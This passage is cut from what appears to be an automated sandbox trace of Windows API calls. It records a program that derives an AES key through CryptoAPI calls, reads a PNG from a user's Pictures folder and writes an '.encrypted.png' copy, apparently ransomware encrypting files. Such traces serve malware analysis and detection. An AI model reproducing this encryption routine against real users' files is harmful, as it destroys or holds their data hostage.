hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.418] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.418] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.418] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.418] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.418] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.419] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.419] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.419] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.419] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.419] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.419] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0041.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.419] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0041.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.420] CryptDestroyHash (hHash=0x7c2240) returned 1 [0041.420] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pispegcnl7-fjt.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.420] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.420] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.421] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.421] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.422] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pispegcnl7-fjt.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.423] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0041.423] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.424] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0041.424] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.424] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.424] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xbaf4, lpOverlapped=0x0) returned 1 [0041.427] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbaf4) returned 0xac2018 [0041.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbaf4) returned 0xacdb18 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbaf4) returned 0xac2018 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.429] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbaf4) returned 0xac2018 [0041.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.430] RtlAllocateHeap 